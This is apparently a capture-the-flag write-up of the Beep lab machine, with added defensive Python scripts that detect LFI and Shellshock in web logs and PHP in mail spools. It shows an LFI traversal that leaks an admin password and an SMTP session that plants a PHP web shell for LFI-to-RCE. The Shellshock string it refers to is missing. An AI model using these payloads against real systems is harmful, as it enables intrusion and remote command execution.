Abusing LFI - Abusing shellshock - Abusing SMTP via LFI
Scanning
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-26 23:45 EST
Nmap scan report for 10.10.10.7
Host is up (0.040s latency).
Not shown: 65519 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp open http Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: IMPLEMENTATION(Cyrus POP3 server v2) LOGIN-DELAY(0) AUTH-RESP-CODE PIPELINING UIDL EXPIRE(NEVER) USER RESP-CODES STLS TOP APOP
111/tcp open rpcbind 2 (RPC #100000)
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: IDLE MULTIAPPEND CATENATE IMAP4 MAILBOX-REFERRALS Completed SORT=MODSEQ ATOMIC UIDPLUS CONDSTORE X-NETSCAPE RIGHTS=kxte THREAD=REFERENCES URLAUTHA0001 UNSELECT RENAME ANNOTATEMORE ACL NO NAMESPACE IMAP4rev1 QUOTA OK THREAD=ORDEREDSUBJECT SORT ID STARTTLS CHILDREN BINARY LIST-SUBSCRIBED LITERAL+ LISTEXT
443/tcp open ssl/https?
|_ssl-date: 2019-12-27T05:50:49+00:00; +1h00m57s from scanner time.
878/tcp open status 1 (RPC #100024)
993/tcp open ssl/imap Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp open pop3 Cyrus pop3d
3306/tcp open mysql MySQL (unauthorized)
4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp open upnotifyp?
4559/tcp open hylafax HylaFAX 4.3.10
5038/tcp open asterisk Asterisk Call Manager 1.1
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix

Host script results:
|_clock-skew: 1h00m56s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 388.60 seconds
Port 443 Enumeration
In this case we have two web servers running, on ports 443 and 10000 (port 80 only redirects to https://10.10.10.7/).
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.10.7/ -k
The directories leak the version of FreePBX (2.8.1.4) being used, but not the Elastix version number. I also tried common and default credentials on all the login forms I found in the directories and didn’t get anywhere.
searchsploit elastix
The local file inclusion and the RCE exploits look interesting.
Foothold - 1
searchsploit -m 37637.pl
Looking at the exploit, it seems that the LFI vulnerability is in the current_language parameter. Requesting the FreePBX configuration through it returns the ARI admin credentials:
# This is the default admin name used to allow an administrator to login to ARI bypassing all security.
# Change this to whatever you want, don't forget to change the ARI_ADMIN_PASSWORD as well
ARI_ADMIN_USERNAME=admin

# This is the default admin password to allow an administrator to login to ARI bypassing all security.
# Change this to a secure password.
ARI_ADMIN_PASSWORD=jEhdIekWmdjE
Let’s try to use the above credentials to SSH into the admin account.
The Webmin portal is vulnerable to Shellshock. Intercept the request in Burp, send it to Repeater, and change the User-Agent header to the following string:
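From a defender's perspective, both the LFI in the current_language parameter and a Shellshock attempt against Webmin leave characteristic traces in any request log that records the query string and the User-Agent header. The Python script below is an added detection example; it is not the User-Agent string referred to above and not part of the original write-up. It parses Apache combined-format log lines, undoes double URL-encoding, and flags traversal sequences and null bytes, references to sensitive files such as the /var/mail/asterisk spool, an include combined with a cmd parameter, and the "() {" prefix that identifies a Shellshock attempt. The log lines, addresses and paths are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Apache combined-log format. The addresses, paths
# and query strings are made up for this example; only the current_language
# parameter name and the /var/mail/asterisk spool path come from the write-up.
SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [27/Dec/2019:05:51:02 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [27/Dec/2019:05:52:10 +0000] "GET /index.php?current_language=../../../../etc/passwd%00 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.9 - - [27/Dec/2019:05:53:44 +0000] "GET /index.php?current_language=..%252f..%252fvar%252fmail%252fasterisk%2500&cmd=id HTTP/1.1" 200 900 "-" "Mozilla/5.0"
203.0.113.9 - - [27/Dec/2019:05:55:01 +0000] "GET / HTTP/1.1" 200 120 "-" "() { :;}; echo test"
"""

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

TRAVERSAL_RE = re.compile(r'\.\.[/\\]')     # ../ or ..\ after decoding
SENSITIVE_RE = re.compile(r'/(?:etc/(?:passwd|shadow)|var/mail/|var/log/|proc/self/)')
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')    # function-definition prefix of CVE-2014-6271


def normalize(value: str, rounds: int = 2) -> str:
    """Strip up to `rounds` layers of percent-encoding so that double-encoded
    sequences such as ..%252f are compared as ../ like the server will see them."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(line: str):
    """Return a finding dict for one log line, or None if it is clean or unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    query = urlsplit(rec["target"]).query
    # parse_qs decodes one layer; normalize() handles a second one.
    params = {k: [normalize(v) for v in vs]
              for k, vs in parse_qs(query, keep_blank_values=True).items()}
    rules = set()
    for values in params.values():
        for v in values:
            if TRAVERSAL_RE.search(v) or "\x00" in v:   # traversal or null-byte truncation
                rules.add("lfi_traversal")
            if SENSITIVE_RE.search(v):
                rules.add("sensitive_file")
    # An include combined with a cmd parameter is the LFI-to-RCE chain in the write-up.
    if "lfi_traversal" in rules and "cmd" in params:
        rules.add("lfi_with_cmd")
    for header in (rec["ua"], rec["referer"]):
        if SHELLSHOCK_RE.search(header):
            rules.add("shellshock_header")
    if not rules:
        return None
    return {"ip": rec["ip"], "ts": rec["ts"], "target": rec["target"], "rules": sorted(rules)}


def scan_access_log(text: str):
    """Run inspect_request over every line and keep only the hits."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        finding = inspect_request(line)
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"{f['ts']} {f['ip']} {','.join(f['rules'])} {f['target']}")
```

Decoding twice matters: a single decode of ..%252f yields ..%2f, which a naive rule would miss even though PHP receives ../ once the application decodes it again. The same rules can be expressed as a WAF or IDS signature, but they are only a detection; the fix is to validate current_language against a whitelist of language codes and to block null bytes before the value reaches an include.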
We can abuse the LFI vuln to execute a PHP payload delivered by mail, since the mail spool /var/mail/asterisk can be included. Talk to Postfix on port 25 and send a message whose body is the payload:
220 beep.example.com ESMTP Postfix
HELO nxg
250 nxg
VRFY asterisk
250 2.1.5
MAIL FROM: example@nxg.com
250 2.1.0 Ok
RCPT TO: example2@nxg.com
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
<?php system($_GET['cmd']); ?>
.
250 2.0.0 Ok: queued as 4227FE00C
QUIT
221 2.0.0 Bye
We can now include /var/mail/asterisk through the LFI, append a cmd parameter to the request and check whether commands are executed.
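On the defensive side, the mail half of this chain is visible in the spool itself: a message body containing PHP is never legitimate in a voicemail or notification mailbox. The Python script below is an added example and not part of this write-up. It parses an mbox-format spool, scans each message body for PHP markers, and reports the envelope sender, recipient and the Postfix queue id from the Received header so the hit can be matched against the mail log. The sample mbox, hosts and addresses are constructed; only the sender, recipient, queue id and PHP body echo the SMTP session above.

```python
import re
from email import message_from_string

# Constructed mbox excerpt standing in for /var/mail/asterisk. The first message
# is ordinary mail; the second mirrors the write-up's SMTP session (sender,
# recipient, queue id 4227FE00C and the PHP body). Hosts and addresses are made up.
MBOX_SAMPLE = """\
From alice@example.net Fri Dec 27 05:40:12 2019
From: alice@example.net
To: asterisk@beep.localdomain
Subject: voicemail quota
Date: Fri, 27 Dec 2019 05:40:12 +0000

Hi, the voicemail box is nearly full.

From example@nxg.com Fri Dec 27 05:50:49 2019
Return-Path: <example@nxg.com>
Received: from nxg (unknown [203.0.113.9])
\tby beep.localdomain (Postfix) with SMTP id 4227FE00C
\tfor <example2@nxg.com>; Fri, 27 Dec 2019 05:50:49 +0000 (UTC)
From: example@nxg.com
To: example2@nxg.com

<?php system($_GET['cmd']); ?>

"""

# Markers that have no business in a voicemail/notification spool.
SCRIPT_MARKERS = [
    ("php_open_tag", re.compile(r'<\?(?:php\b|=)', re.I)),
    ("php_exec_call", re.compile(r'\b(?:system|exec|shell_exec|passthru|popen|proc_open|eval)\s*\(', re.I)),
    ("php_request_input", re.compile(r'\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\b')),
]

MBOX_SEP = re.compile(r'^From \S+ ', re.M)   # mbox "From " envelope separator line
QUEUE_ID_RE = re.compile(r'\bwith \S+ id (\S+)')


def split_mbox(text):
    """Yield (envelope_sender, email.message.Message) for each message in the spool."""
    starts = [m.start() for m in MBOX_SEP.finditer(text)]
    for i, start in enumerate(starts):
        end = starts[i + 1] if i + 1 < len(starts) else len(text)
        chunk = text[start:end]
        nl = chunk.index("\n")
        envelope_sender = chunk[len("From "):nl].split()[0]
        yield envelope_sender, message_from_string(chunk[nl + 1:])


def message_text(msg):
    """Concatenate the decoded text/* parts of a (possibly multipart) message."""
    pieces = []
    for part in msg.walk():
        if part.get_content_maintype() != "text":
            continue
        payload = part.get_payload(decode=True)   # undoes base64/quoted-printable
        if payload is None:
            continue
        pieces.append(payload.decode(part.get_content_charset() or "utf-8", errors="replace"))
    return "\n".join(pieces)


def queue_id(msg):
    """Pull the MTA queue id out of the Received headers so the finding can be
    correlated with the Postfix mail log."""
    for received in msg.get_all("Received", []):
        m = QUEUE_ID_RE.search(received)
        if m:
            return m.group(1)
    return None


def scan_mail_spool(text):
    """Return one finding per message whose body carries a script marker."""
    findings = []
    for index, (envelope_sender, msg) in enumerate(split_mbox(text)):
        body = message_text(msg)
        hits = [name for name, rx in SCRIPT_MARKERS if rx.search(body)]
        if hits:
            findings.append({
                "index": index,
                "envelope_sender": envelope_sender,
                "from": msg.get("From"),
                "to": msg.get("To"),
                "queue_id": queue_id(msg),
                "markers": hits,
            })
    return findings


if __name__ == "__main__":
    for f in scan_mail_spool(MBOX_SAMPLE):
        print(f"message #{f['index']} from {f['from']} to {f['to']} "
              f"(queue id {f['queue_id']}): {', '.join(f['markers'])}")
```

Scanning the spool catches the payload at rest, independently of whether the include request was logged; running it from cron against /var/mail and alerting on any hit gives a cheap second signal. The queue id ties the message back to the Postfix log line that records the connecting client, which is how the HELO name and source address of the session above would be recovered during response.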